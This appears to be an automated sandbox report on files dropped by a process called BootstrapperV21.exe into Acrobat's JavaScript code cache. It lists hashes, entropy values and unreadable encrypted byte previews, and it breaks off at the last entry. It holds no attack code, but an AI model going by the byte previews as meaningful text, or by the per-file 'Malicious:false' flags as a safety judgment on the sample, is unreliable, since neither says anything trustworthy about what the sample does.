                                                                                        C:\Users\user\AppData\Local\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\230e5fe3e6f82b2c_0.ENC

                                                                                        Download File
                                                                                        Process:C:\Users\user\AppData\Local\Temp\BootstrapperV21.exe
                                                                                        File Type:data
                                                                                        Category:dropped
                                                                                        Size (bytes):224
                                                                                        Entropy (8bit):7.02202723010118
                                                                                        Encrypted:false
                                                                                        SSDEEP:6:THTx4h0gfV5OEgF0YHr5Xm1x3o/eg1rovLU4m+dZsw2z6:71k0aSEOl2Pg1rovY4hZ/
                                                                                        MD5:11B03424A75955FD5216F69FF3D4E3AC
                                                                                        SHA1:EC5F9B27AB4310D37F1DC7183E0016D5FB2757CD
                                                                                        SHA-256:E04F4BAE09EEEE5F68293927ECA606FB533596EFF8F5F0CD83CD0FD04C0B0E47
                                                                                        SHA-512:ABF9ED9180EEC3D4F5769B9E19DEBF0F8893E899F35A6F0692D8DAE0D6A473F13A4239144F4E612DA75BDD8649BE049288B8C2DF7EA8B65EED009D2309B0350F
                                                                                        Malicious:false
                                                                                        Preview:.q...u./.0.3<:z....t..Ox.....w*...:5<.!b.f_...zp.B...+..!_.~.`..kd}."...l..@.]Sg..R(.....H..Wec!.....S..Vo..l|)N~;Wk.3...3.Q..3..H...22..NSH_SHs0t.r.u...C...OM.xo......a....*q...FP&=H.....?W{..=.j...X.R....:|.T..%

                                                                                        C:\Users\user\AppData\Local\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\2798067b152b83c7_0.ENC

                                                                                        Download File
                                                                                        Process:C:\Users\user\AppData\Local\Temp\BootstrapperV21.exe
                                                                                        File Type:data
                                                                                        Category:dropped
                                                                                        Size (bytes):224
                                                                                        Entropy (8bit):7.073855982219202
                                                                                        Encrypted:false
                                                                                        SSDEEP:6:fe8ctUP+2XSYXq48lyo2Rf2X15Jt9dTzN3Ado:lctUGWbXX8rOqXDFWdo
                                                                                        MD5:76593637147A305A68AC2128FBEA20D8
                                                                                        SHA1:83E05D0999CFDBBE5C42BC860DECB64624D55BC8
                                                                                        SHA-256:72456347EFCFF2E44A9CB172867BAD1B1ECEDAEFAE4BFE6694198198B14AFDF9
                                                                                        SHA-512:D0B4835165C874B09C293C0F93DE49EF41F0A80B3F5B41CF6E7BFF815F829A61C401027775DEC15413EEF3402AE3B995CC89690B5E62B9ABE7BA3FB3B2D1F52C
                                                                                        Malicious:false
                                                                                        Preview:u..`.-....C'.....4.*./..KB{....J.[JX.......\s.$...c?.0.....cC)......M.:..|.y.lpO.n.D.`z....xL......FenP>.l|...e..D.."...|....}5.(.8....&]....1%.'.X..%.....M...8...>.)r.Z..=CH..&..@M..X...!..4.*.+m..!5..,...

                                                                                        C:\Users\user\AppData\Local\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\2a426f11fd8ebe18_0.ENC

                                                                                        Download File
                                                                                        Process:C:\Users\user\AppData\Local\Temp\BootstrapperV21.exe
                                                                                        File Type:data
                                                                                        Category:dropped
                                                                                        Size (bytes):192
                                                                                        Entropy (8bit):6.9046021336217365
                                                                                        Encrypted:false
                                                                                        SSDEEP:3:S2x1HBXIN3dMYtnzMflAddRqDxVhzlcSnccoB01gEd8xfTbOiT01pxBjuhkiCHxF:p2NOiMNkgV/cUtoAtqTqiTKDBiCH+U
                                                                                        MD5:269D4540D0A0A791FB67955E8B8A58E7
                                                                                        SHA1:7C5205E5F64FD85887B86C7E4EA3832D2F480789
                                                                                        SHA-256:74A938BE6E0EC3EDFCE5EE3319BB14DC526E98F6F1B8B6528E811DCF0267F0E7
                                                                                        SHA-512:5AA9D851E39CC948C8F61598BC3A3523A129B5E91AA772593EAF7E718B049C1E0D936DE23C45E5B7DE3FCFB8A37115E093A2FCFB5DD13E6D93D547614A5A7428
                                                                                        Malicious:false
                                                                                        Preview:...u.....A9.}...#<Y..Z%..d.z.\oOz\...0.$[.._...T$..e....-.B...T.f..3...`C1xg..$U.t0%...`........wBy9ju$.Wy..dr.).w.u.......>`.....Pu`4.#.i+..Er.;t.*q.`....FX.........(....:DK....[..:.p

                                                                                        C:\Users\user\AppData\Local\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\4a0e94571d979b3c_0.ENC

                                                                                        Download File
                                                                                        Process:C:\Users\user\AppData\Local\Temp\BootstrapperV21.exe
                                                                                        File Type:data
                                                                                        Category:dropped
                                                                                        Size (bytes):192
                                                                                        Entropy (8bit):6.997493815723924
                                                                                        Encrypted:false
                                                                                        SSDEEP:3:Eb86orn3UglqKQ/8toExmG/vjHCLb6jE8DZO0TOabq7dS6SVJRd2KGTsQmDdPUPM:XFZQ/LGjH+b6pO0qWnzGTMdsk
                                                                                        MD5:B5E1F6FC9FFC08C28D8ACA4686BEA238
                                                                                        SHA1:B93580868EC7721F16BE0EEA5F5E617494774CDF
                                                                                        SHA-256:424DAD052A06B164B91AF708B0F51B064B483B95124C0DDB8171B64C104EB1BF
                                                                                        SHA-512:E66046B49CA2E1C36DBADBCDA4020E0C629961241615A84E61CA3E00EDAB5072145C5B9350464B7AD282B064B58AEFF399C5DF741B99DEEFC7052BA0CD03310A
                                                                                        Malicious:false
                                                                                        Preview:.R4!....>.)....&..~Cu..D.M...]+..../~..U3....,-(*...u..u....H........|.....J`0.e..N...~....n..+7..c k.{..9...8.3.Wm#.,^z...L....A...C........N..v..t-....G....<X..j. .... .\b.<..Zi

                                                                                        C:\Users\user\AppData\Local\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\4ca3cb58378aaa3f_0.ENC

                                                                                        Download File
                                                                                        Process:C:\Users\user\AppData\Local\Temp\BootstrapperV21.exe
                                                                                        File Type:data
                                                                                        Category:dropped
                                                                                        Size (bytes):224
                                                                                        Entropy (8bit):7.043700234441686
                                                                                        Encrypted:false
                                                                                        SSDEEP:6:i8Fn5nhQ7IwX9n/hrW4UweB5ywZjKQgf02u8yUwb:i8Fn5nIlrWJwe6wZjKQgcZh
                                                                                        MD5:704AC037FA375A8C56F5FC541D7E53E7
                                                                                        SHA1:F8BEF60DCEFB219A50E47357CA11F43D0A675A2B
                                                                                        SHA-256:D12773CB772089EC7CB2AA5C6C7FF85F2F91EBE9A47FF11AB481307F6CFAA8C8
                                                                                        SHA-512:AA6E8D0D5EFD382A88BB488B0AEDFC76801892E4A098C4E3B7BA2CEAADE400D39F759A84553A82123B7739F25F50D4F51B79C08721E6F8F440B5547344B786A5
                                                                                        Malicious:false
                                                                                        Preview:.Z...h....Nn.]Bx.N...BDd....D......-....]}'..............t..V.[.>.JQi..Q.mu...g...Z.e!.r.k....\..6th.1..D...x.\..s....... .W.un....u.n.U......l{..l.X).U.w.....n........@7...w..../.8.p.P..6W.....qt3&.g...Da)P}E.[.

                                                                                        C:\Users\user\AppData\Local\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\560e9c8bff5008d8_0.ENC

                                                                                        Download File
                                                                                        Process:C:\Users\user\AppData\Local\Temp\BootstrapperV21.exe
                                                                                        File Type:data
                                                                                        Category:dropped
                                                                                        Size (bytes):192
                                                                                        Entropy (8bit):6.996319011092763
                                                                                        Encrypted:false
                                                                                        SSDEEP:3:YA2wzFLiGcFJPMzgfx4tGye0+h+lZB5XgKJKOj/h8zb9PssSQ0NR8kO+AsBacgsX:PXFkJPygfyao/5XgKJzj/hQb9EsKfO+5
                                                                                        MD5:D1E8621CCE5C5A3303779DAEC63CA6A1
                                                                                        SHA1:F7A0AC9CD065A91C794034721817D6C7E1CEA834
                                                                                        SHA-256:9F9D18721A980DC85917C774ED3BEB60737AD244F67112A4657C4706749BFCF0
                                                                                        SHA-512:BF01FB2CE9C5DE8323B5DD2FD7A97307065EED3DEC3A9B44C7434249F9BD806D8F26D8E7EEDAC25525C26C0BF1C62E641D5DE6A6EFFE99FB90F8DCAC075DA641
                                                                                        Malicious:false
                                                                                        Preview:Q..9.mp>..|.$<.%`.H..........7.....(rt..f.U...X...dI..`x...?....Q..cR.s..4..r.$\r./l...,...2...DY...6..".(.G.05...&Uy..*..Y%^@B..25._...8.p..E..O.r. .I.a..v..MS.I.c *b .....o..R|.D<

                                                                                        C:\Users\user\AppData\Local\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\56c4cd218555ae2b_0.ENC

                                                                                        Download File
                                                                                        Process:C:\Users\user\AppData\Local\Temp\BootstrapperV21.exe
                                                                                        File Type:data
                                                                                        Category:dropped
                                                                                        Size (bytes):256
                                                                                        Entropy (8bit):7.042687818381617
                                                                                        Encrypted:false
                                                                                        SSDEEP:3:EW0zLI42nylbg/Ok9nTGLqbjFQhRhWzPD14S7L4NUAX+LtJ5Xt/s8pNQvQjO+MEt:Oj27rhCSMAbD1ff4uAytU8vMETVqM
                                                                                        MD5:7E3DC8FF674F6C5E1EF344F7380AFCB6
                                                                                        SHA1:4B76E1939F9476DF2E397E5FDF33B7BA9485EF17
                                                                                        SHA-256:570AA6C3D826C87BE775FFBEB56DC02ED4844B9BB4700F49B4B22EAFB0D6B105
                                                                                        SHA-512:E20199D0E3737854141C266672F85DC6F472FA17A37998BC6985381832EBAC076D6042B41EC4855ADDD59076B04FE5805F69D55DBC919B0FADDE97288505E5C3
                                                                                        Malicious:false
                                                                                        Preview:....ts..b....V.:..1....p.2-...vg.{.k..WsT.f.zBp..>.R...C.tPmXh...:.G..4..R.cw].G.y..E..."].u..@c.w.....{..`..c..w..........d.....w4..mu.R'....+...r..xeG...8..y.3.Q...M.fd....++..j.).)....52[fu...h.{...5t..$.w...2(4.%.....i....JX.].i.O.....b+..Wt`f

                                                                                        C:\Users\user\AppData\Local\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\6fb6d030c4ebbc21_0.ENC

                                                                                        Download File
                                                                                        Process:C:\Users\user\AppData\Local\Temp\BootstrapperV21.exe
                                                                                        File Type:data
                                                                                        Category:dropped
                                                                                        Size (bytes):224
                                                                                        Entropy (8bit):7.127427410790631
                                                                                        Encrypted:false
                                                                                        SSDEEP:6:i8FXvAVHZu6mleJRnyixLS2tjBI71aBvW:i8FXvAhZuvlmnyELptqMBvW
                                                                                        MD5:56425001041D364B6F19CCDA6E083642
                                                                                        SHA1:7ACB75811F69BA497C260F8096EECD1612F4F460
                                                                                        SHA-256:87D5B2A1D37B1F400BCDE529955A41DD8D6F362139627B440051421AF95A3B29
                                                                                        SHA-512:FB0C2391A1520422540E3B44147C1FC7CDBF31543BFDEA5844023E91B1A0E639E2538A375BE84363B947F0E15A604D01C33C29753E81B06A470563BB234AE063
                                                                                        Malicious:false
                                                                                        Preview:.Z...h....Nn.]g.Z..sR.Z...ij..#...}...Om?...........28;.....}..M.J"[x..{Ns..........Q....r.'BV......g...^*...U....c..._E.L ..Z.op...0..dL..w.|]T...."0Xs$|]cER.0.,&.....C.-.k...1.}...%..9.....m.$t..R...f...X...oTA.

                                                                                        C:\Users\user\AppData\Local\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\7120c35b509b0fae_0.ENC

                                                                                        Download File
                                                                                        Process:C:\Users\user\AppData\Local\Temp\BootstrapperV21.exe
                                                                                        File Type:data
                                                                                        Category:dropped
                                                                                        Size (bytes):208
                                                                                        Entropy (8bit):6.8685511677708995
                                                                                        Encrypted:false
                                                                                        SSDEEP:6:Gw7dT5UaZVUpSNB9QN0tBuxi7jls4pwfZo:GKdlZmAr9eWBlu4paW
                                                                                        MD5:7D1986071FD0F1239A4266505B38C063
                                                                                        SHA1:98D659E3165C9EC51CA67BECD3C600EC9F539E32
                                                                                        SHA-256:2BD321E2BC75840368EA3D3CDEA8987B9A1F2DB1810857738529B424E519EEA3
                                                                                        SHA-512:506FF59A677F4AA2F3444F0A492D0887C1129B344157FCEB599A15423991E084FF6AF98E557EC6681CD818E300BDA79B89A0485F2BBF5355AB44F9FE90D9FF4A
                                                                                        Malicious:false
                                                                                        Preview:?.IO..!be.8......q.O.o.9W.I...S`..t.0.]....L.e=..~w.+0../cL....s-..$.5>M..L.W...9cE...k.W.....h.u.1....&...&...qfM.....Ex..t^........._....N.&VaMo..H......O.o.B}.7O....L..M.MH..RI...L$..r...;.$.F.t...

                                                                                        C:\Users\user\AppData\Local\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\71febec55d5c75cd_0.ENC

                                                                                        Download File
                                                                                        Process:C:\Users\user\AppData\Local\Temp\BootstrapperV21.exe
                                                                                        File Type:data
                                                                                        Category:dropped
                                                                                        Size (bytes):224
                                                                                        Entropy (8bit):7.067115915235599
                                                                                        Encrypted:false
                                                                                        SSDEEP:6:i8F2qa0w+DyDz96xj3Ck8w98ZdeTzWcC1NRXIFrDcIZ70jBh6:i8F2qa0CDJ6Ow9I4VaR4+I8Bs
                                                                                        MD5:24D1167EC5D91E735F5AFA9EF1D86EC4
                                                                                        SHA1:D88857EAC808029BF98436E532E3D67CBF1DDE8C
                                                                                        SHA-256:2B594DDF6BA533E91B07A49869337913F8B0EC7218D8B139A9AF109955324EB6
                                                                                        SHA-512:92D8381B9CD3AE1EB3B3EE093F26935C3557537BCD343C0EFB6ED9830CB49EF12DA349F0D620BDBD0AAC69D423F66ACAA3C9A354D6BCBB30B390D6D2A0C602CF
                                                                                        Malicious:false
                                                                                        Preview:.Z...h....Nn.]..b....A...S..0.j.0.".V.x.25hv.'....K.e#....<.cv..#y.\R..,.......8.c....O4....x.....J5Gl...(....p"Wj$..xN..k5........X8=..yH..5...F...[.......MV.x;.c..$.0...:4...3*...zy.v.....L.f...(o.......A...F..g.D_

                                                                                        C:\Users\user\AppData\Local\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\72d9f526d2e2e7c8_0.ENC

                                                                                        Download File
                                                                                        Process:C:\Users\user\AppData\Local\Temp\BootstrapperV21.exe
                                                                                        File Type:data
                                                                                        Category:dropped
                                                                                        Size (bytes):240
                                                                                        Entropy (8bit):7.074857926820819
                                                                                        Encrypted:false
                                                                                        SSDEEP:3:hE9iLZfQyRN5C1TdzBxflIeeKykSZKQNf/Hnf4nRs2vyewmky+sVRfQGZ81NpW+Q:hE4FrKTT3I8HoK8X4nRsG+sVX81NpWH
                                                                                        MD5:11DDC4BD9824D8C3CCC57229C36D21B9
                                                                                        SHA1:63707C5B256EE7852A1411EE4A9231A6DAC48470
                                                                                        SHA-256:6E09DCAC0B726F4E8B9D8EA64E60449308DE6F16780B626694748916B23F9A26
                                                                                        SHA-512:E526633EA09AF287F5406F446D7FF7F85A7213178F96A1D60C2F904E29BBF9840E350553AFADE929EC468F8FE21B1188C447414563373BF072BBFCCBD8F61DDC
                                                                                        Malicious:false
                                                                                        Preview:XT..u.........A....X...d.*&...!.zR?.._5.`.a..t(.9).......ve@\.{c.#G,.;...@m..HYW..o.........b.{..x..L9...d..$v...@..zZ`..!...5.'c..~.U.%&:.......=.q.gQ...._q..V{c..\....~.W...0...0M)......5...W.).:..e.6.v./..T[.W ....O.-2{4.F..}.

                                                                                        C:\Users\user\AppData\Local\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\78bff3512887b83d_0.ENC

                                                                                        Download File
                                                                                        Process:C:\Users\user\AppData\Local\Temp\BootstrapperV21.exe
                                                                                        File Type:data
                                                                                        Category:dropped
                                                                                        Size (bytes):224
                                                                                        Entropy (8bit):7.065934386188766
                                                                                        Encrypted:false
                                                                                        SSDEEP:6:tUvmfWtgSa7i3CbAfSQiXlgtB6KVTHX9Hf+6BHq:evm+Va2ybxQPtBtT39WGq
                                                                                        MD5:4A978B7ADABA2EDBD1231A849FB9341F
                                                                                        SHA1:A82213B9C8683A532D8A2B44D6220400CD0E74DE
                                                                                        SHA-256:6A50CA1ACB42FE231C13E23AFD1753E6A3872775AA1CA6C9AB8D2ACF477EE733
                                                                                        SHA-512:D91A2CEED6CB9793CBAC6E4BCC78D383C80B56BA4D3D0552B8FFF00C57C15CA330CB5D5E30566212C9AF2B2E1790E784850E6C5CC2FD34495357208FA8A9B7D6
                                                                                        Malicious:false
                                                                                        Preview:..*..o..5.J0[q}Jt...q...v...y..pU.n.)..-..s.QL.xK../.'......T..h..l-........K...[.*....."..d.h...9.B....u...{....)zC.4c.4.i.e..C:.c.Q.W...kb...P;.....S..7..@T"..VCE..~u+H"......q.^x..]2.QxX.v....p.*....E:..[W...

                                                                                        C:\Users\user\AppData\Local\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\86b8040b7132b608_0.ENC

                                                                                        Download File
                                                                                        Process:C:\Users\user\AppData\Local\Temp\BootstrapperV21.exe
                                                                                        File Type:data
                                                                                        Category:dropped
                                                                                        Size (bytes):224
                                                                                        Entropy (8bit):7.104011729996716
                                                                                        Encrypted:false
                                                                                        SSDEEP:6:1Ur6Adb6VnHLergoLnGc/wp1Ziuhq4LzVfBGWVYQn:8perekWnIjpLzVrVYQn
                                                                                        MD5:BD6435214038DAC7BC8EA20B235EDD17
                                                                                        SHA1:3D8959FF816565EA4B3BB96618D2D27743232105
                                                                                        SHA-256:41C5098801AB1B1E8E573B37FCC8FA776D921B38A5C40732B0777FD3D6FE17A8
                                                                                        SHA-512:F7A5AED0E29F07B53DBD360608822C5B056C879234FFBF2B86EEAF70E2F40D270EB27BAA1E7E6CA8C3C5A3A09D875E8C57231D79B20F03D7905807A2CD742C72
                                                                                        Malicious:false
                                                                                        Preview:m.b<.v....N..s.!.......*]w.%..*9...@..d.0.e.~$..)....i*.l.o.}..._08.Z2..|.p....;Z...V.....~..\....X..o...r$.=...`.?7&...b.PJ..)'....*..a..k...F..[P....b...6~A.u.......v4.....R.T)4....a.vy...I.n...m8T.q:..v+..G../R.6

                                                                                        C:\Users\user\AppData\Local\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\8c159cc5880890bc_0.ENC

                                                                                        Download File
                                                                                        Process:C:\Users\user\AppData\Local\Temp\BootstrapperV21.exe
                                                                                        File Type:data
                                                                                        Category:dropped
                                                                                        Size (bytes):224
                                                                                        Entropy (8bit):7.034325835021554
                                                                                        Encrypted:false
                                                                                        SSDEEP:6:6AxNqesPyYjmLFeJAj0ZhgsZUD6Zre4xcRWzWn:HNq16YqOAoFZNDxcRWzWn
                                                                                        MD5:1E64C5EC4FDB2AD0708CC43CEEB3CAC3
                                                                                        SHA1:33FE0BC11DE538563923992A5277FAFAA3AA349E
                                                                                        SHA-256:B79219B8638AB1FAED3CDA10DCF4340FB1456D44BEE41BCBAFDB923D0A009B29
                                                                                        SHA-512:F832A574E5F96FBF9CBF6C604A2BC2D39B0CB23FFFF55499653C5336F5F275B5756074EFB58423007C4EB143323A53A80AE7458E41ECEF18B45CF058A0882A74
                                                                                        Malicious:false
                                                                                        Preview:..,?p..:.twzF`(I..........v....T<....._..#}.R6...-#).Pj...+...F.....Ov.X..r...b.....].c.A/....v_..k..xa.;. i<.4?....QY.l.|..wM...Nv.Q.2v...d....<.*.F.j.=F.j.Y...9.......+..\+c..RY.^.>.z.RB..m...1j4,./b.-..X....2...

                                                                                        C:\Users\user\AppData\Local\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\8c84d92a9dbce3e0_0.ENC

                                                                                        Download File
                                                                                        Process:C:\Users\user\AppData\Local\Temp\BootstrapperV21.exe
                                                                                        File Type:data
                                                                                        Category:dropped
                                                                                        Size (bytes):240
                                                                                        Entropy (8bit):7.156564762130977
                                                                                        Encrypted:false
                                                                                        SSDEEP:6:4ox2SjD1GktIkLXms6OT9pel2lebUbxxuUPQKjJU+ge0a:4ox2SX0qLX598sPbxxuUIcwa
                                                                                        MD5:A13F3C6077495BA61B0BB0B94F5940F3
                                                                                        SHA1:E2E6D70AEA2396917757FDE5E6C1AB03FA52066D
                                                                                        SHA-256:837AD74C02453888EC07FA03928ED5A430F0981959A6A2C13F29226CB3E45679
                                                                                        SHA-512:E4AE96A07C8AB5A2B46771212E93542AA1F1843579E95B1092E43012EB868B8EE31AFB3AB53FAF2905FE21837EC1F677AF57A9E39C46445AFBCDCCD3221AB182
                                                                                        Malicious:false
                                                                                        Preview:3..~.@...].....:..O..j.Q}...../...}>cui@...&....qq>..CKmf....f...)o..J...<=}..T.v4...+D.b..XD$&0-..-...... ..:i!,|...>..m.=,...6x..m...Y......ha?R.zI...mT=..v.t.;.bC....@..;..6.........K.lX..Q_............:.....@;.^.D.j..\.4bJ4q.

                                                                                        C:\Users\user\AppData\Local\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\8e417e79df3bf0e9_0.ENC

                                                                                        Download File
                                                                                        Process:C:\Users\user\AppData\Local\Temp\BootstrapperV21.exe
                                                                                        File Type:data
                                                                                        Category:dropped
                                                                                        Size (bytes):192
                                                                                        Entropy (8bit):6.983145443316823
                                                                                        Encrypted:false
                                                                                        SSDEEP:3:kVTqFgW2aDwV1ujRDSo5HcH6WuTeMdTEtdp8/9c0g0d6l1uu3SgmQQWINgs:kVNzaDwV1ujROR6WuTTdTEtdC1c0Alkz
                                                                                        MD5:72B5FFAC2576FB7719B5C0AEE8D92A81
                                                                                        SHA1:981EE5A7F1EBB8FF60C47775163E7EF76E5CDEDD
                                                                                        SHA-256:5A6DFF90B088F99916692D6A2D50E910C2174CC4E58F98EE5803FBAE6AD52582
                                                                                        SHA-512:691DCACCA3A7F8F4BD5D7AF750ADBCF422E5891A8B625340DC8AD3585E0A9AC7D25331DBAB68D314809BB156A72EC5A375BA69510FAC351740B3BE04048F261D
                                                                                        Malicious:false
                                                                                        Preview:....\...*......1.R:.M0....=$1..7k...|...LC.siH{.qP.44.7...A:w........7+.pl.u.3..vyz.i..@...!.x.......M.....A.$#-....W.2.~....KX./......x.2.x..H....d.n.....Z....s1j...5..-r.a.c....

                                                                                        C:\Users\user\AppData\Local\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\91cec06bb2836fa5_0.ENC

                                                                                        Download File
                                                                                        Process:C:\Users\user\AppData\Local\Temp\BootstrapperV21.exe
                                                                                        File Type:data
                                                                                        Category:dropped
                                                                                        Size (bytes):224
                                                                                        Entropy (8bit):6.999618524705405
                                                                                        Encrypted:false
                                                                                        SSDEEP:6:wU512MzY769wY19ziMf9KlyUJzZsaQICxutq2VgKXW9:wUCIB19eM1Klyo1sbIJtMKm9
                                                                                        MD5:424066A4AC5EA9D4A6D8201FDCB4A770
                                                                                        SHA1:DC7996A63AF5B155006626A32D790D2F7465A455
                                                                                        SHA-256:7D79F20A6C2D2816BDD5932F33324B916E65F024F95880F9A2FB10D02A9DE3C6
                                                                                        SHA-512:C73304CC53A4836503251AF077E11D93CF532F195A1644431FA746C54096432C78ACBE10F18CCB93C002B64C9A3D45C99BA713307426EA58FFF82A94A890F122
                                                                                        Malicious:false
                                                                                        Preview:i..c..X.... ..T....8HC...U..4.....oCU.8.V..UD.G.J.@.%..r#....z.1..i.K.Q..`.GO."...^Q...h.z.@...M.......~..D.[jX.......b. ..;.\-{.~..Z#.d*.p.L-m3#Tzg....G.C...2.P.2._..i.ro...........QdS..w2....*...[.._...;`......Z...

                                                                                        C:\Users\user\AppData\Local\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\927a1596c37ebe5e_0.ENC

                                                                                        Download File
                                                                                        Process:C:\Users\user\AppData\Local\Temp\BootstrapperV21.exe
                                                                                        File Type:data
                                                                                        Category:dropped
                                                                                        Size (bytes):224
                                                                                        Entropy (8bit):7.064927410790628
                                                                                        Encrypted:false
                                                                                        SSDEEP:3:uXA5gr0GHWh1ycvg5SeQpZ4j89gMUJ1JPGLgeIjma8PZBEFJvJmdcqt1/itkY5j9:umu0ozwrUTJ0geMmRr4FEcqt1i5Md70n
                                                                                        MD5:77603FB0E5007281E79E1814E6F18BAD
                                                                                        SHA1:A0065A313AC9587C4EE005B936A3A8F71362BB8E
                                                                                        SHA-256:3CB93F5B57D2C1D4413E8898D43B16007E95ECDFC4ECA2A34A13CA4DB00C4295
                                                                                        SHA-512:03489793EBB8F90B20A5C231CABCC965EDD5C6F13F751BDA6835A617DB83571AAA192E7FF6A3BBD16B886A551756F6E3630C02578230B27B402FA62E4DEA8227
                                                                                        Malicious:false
                                                                                        Preview:.Idr......_.)"%... ..I..4...V.G.\t.zd...F.I.0....).M.......C...W{eT...5.0.8..~.%.nC..BS.....).f...Ici1.....Q.;j@.Z...{..X...V....o.Bt{......p.yDlM..9...j8dOhky.wd....ap.G..4'...'..;..$.......L.........Z.}5\....5.

                                                                                        C:\Users\user\AppData\Local\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\92c56fa2a6c4d5ba_0.ENC

                                                                                        Download File
                                                                                        Process:C:\Users\user\AppData\Local\Temp\BootstrapperV21.exe
                                                                                        File Type:data
                                                                                        Category:dropped
                                                                                        Size (bytes):240
                                                                                        Entropy (8bit):7.105732549880059
                                                                                        Encrypted:false
                                                                                        SSDEEP:6:DWI3VzY9A0/Y39m5g3fkhOdm0hAywhtA2ucd5bEn:DNls9AWi9mwfk8dDhD47bE
                                                                                        MD5:72D400EE102E258309F9303BACCD7490
                                                                                        SHA1:FA430284CB0B11BB029307BEF59EA519386A5D00
                                                                                        SHA-256:FA44868EC5D61D680424869E85A1A2DEFB3A7EB5D739BD9BD08C500071FA145B
                                                                                        SHA-512:C821E99850A69C90C29A6DD117587EA0FA0643C2123053C4440666CB2282A4CB84CCD1A27FCDA6A4159D86FC8BAB2068BEB4D7972197A6F325AF8E10A90496DD
                                                                                        Malicious:false
                                                                                        Preview:..^..._Qu\8.....\.{.@y..0R.....kD.f..x..mkP.x.6.G.....<..Al|Z...S:..1.00"cG.j.....u.1I..E?QZ.b.#!..:...s"Al........T.@...,3l...&{..^.l6$4..4.....^.X...5...5..........Z?..&o......G,;..13.m.n....P..q0..TC|..7&.V.)t....0..d.gp.Kh..l....

                                                                                        C:\Users\user\AppData\Local\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\946896ee27df7947_0.ENC

                                                                                        Download File
                                                                                        Process:C:\Users\user\AppData\Local\Temp\BootstrapperV21.exe
                                                                                        File Type:data
                                                                                        Category:dropped
                                                                                        Size (bytes):224
                                                                                        Entropy (8bit):7.061557377298828
                                                                                        Encrypted:false
                                                                                        SSDEEP:3:Omp6jDGlSQAWvSg0+AcC7Mwi/pY+ryldV6o+U86dpCvVpfTbI15UwI4kzp0mgIIW:t6/GBSxEkH386dpCv0rI4kzaXI0rWHgg
                                                                                        MD5:ADD9896437E29BB96FA8A7CA39065FD8
                                                                                        SHA1:569BF014EC864200848CD5C15AB37426CDDC775B
                                                                                        SHA-256:17E413202222CE3F91F99870017C78AE6378755ACD79BC7470A7C291F36B96B2
                                                                                        SHA-512:80B98CAC773A665D9E6E6A8426CAECEE4CDCB3302204B8E497263EAC05768835119141C2E588CC2BBA592621B15132E3CCDC4C191D90005E26595CE2FEA8451F
                                                                                        Malicious:false
                                                                                        Preview:..*..o..5.J0[q}J$FO.#.M. .7.....&......p.wu...'.~n.+...8.}..r..G.N......D...8..>;..B..[.A..Q..!...kY.+.'....D.F..."V...s.H0....H..O..i...;....U-]..#Ad.h..X.l........e.Ku...0...~..xY.9..?4;..|.2r..|B.i.P$[....;...DR0

                                                                                        C:\Users\user\AppData\Local\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\983b7a3da8f39a46_0.ENC

                                                                                        Download File
                                                                                        Process:C:\Users\user\AppData\Local\Temp\BootstrapperV21.exe
                                                                                        File Type:data
                                                                                        Category:dropped
                                                                                        Size (bytes):224
                                                                                        Entropy (8bit):7.047070267933489
                                                                                        Encrypted:false
                                                                                        SSDEEP:6:c1mEGwqP7iIaOWqJqot0nG9rgcx8DtuSgTerqapn:0dqmYsG9kxUWqin
                                                                                        MD5:97AC325B052DB04AF724FA20D82DBF65
                                                                                        SHA1:9BDEA11D90DC145EBF5667937F41D79A680F3F3F
                                                                                        SHA-256:3C6FA7B187493D5831CC597840C542796789FF83B4DF4316C7036BCDB7E6104D
                                                                                        SHA-512:96A7F9EB0B2E62FEE342CC03D29920E16188DC534E2025E4C685B817BB4EEDBF28114F862093F899A7CE047DC5942360E54EC1D50822A877CFF56F098F17F81A
                                                                                        Malicious:false
                                                                                        Preview:..d...2.X.b.....-.......q.Ob2..v1.;..y.`.w...0.....[w.......F.....N.('.....3-.,g.k.d...I,...M^......t..f....)W..).CLu...q....);;......2Ds.h.b.)v.. ..T.<Y..}`^..#....%..jV...K6&....s2.... ..;Qzc.]..0....[.....+..

                                                                                        C:\Users\user\AppData\Local\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\aba6710fde0876af_0.ENC

                                                                                        Download File
                                                                                        Process:C:\Users\user\AppData\Local\Temp\BootstrapperV21.exe
                                                                                        File Type:data
                                                                                        Category:dropped
                                                                                        Size (bytes):208
                                                                                        Entropy (8bit):7.087223972844765
                                                                                        Encrypted:false
                                                                                        SSDEEP:6:4t06gqL5J6d27oDu7Z88Wwlhh8b1uJrSE2:xfWNoDHwlIB6rSN
                                                                                        MD5:CD8B498843D3D00CC411F76144DEE920
                                                                                        SHA1:B091C60321FBE6AB2492A843F0198E13BB49E996
                                                                                        SHA-256:C17C5450877C004A8FE003BD0BEF7B59D4ED9490F10D0431ACD9E95E073C503E
                                                                                        SHA-512:9E2C42157501137EEBDC533F2FC4601F3BACABF5347DC119AF6CC6FC66644A59BE7659D60C15EBB54DE8912F802304F6AF6E54CEE3A921DCB2945DBF48C381F0
                                                                                        Malicious:false
                                                                                        Preview:..O..~.3.G2...-.J.N\t.d....85`..FL.]$WG...{......6.B...m...[.]Z2.........B<....$.<..S.........8.(.......q@..>............7KP.......^6`......E...../.....|h...t....C.M.0.....<'.].T.~.;....5.I....p.

                                                                                        C:\Users\user\AppData\Local\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\b6d5deb4812ac6e9_0.ENC

                                                                                        Download File
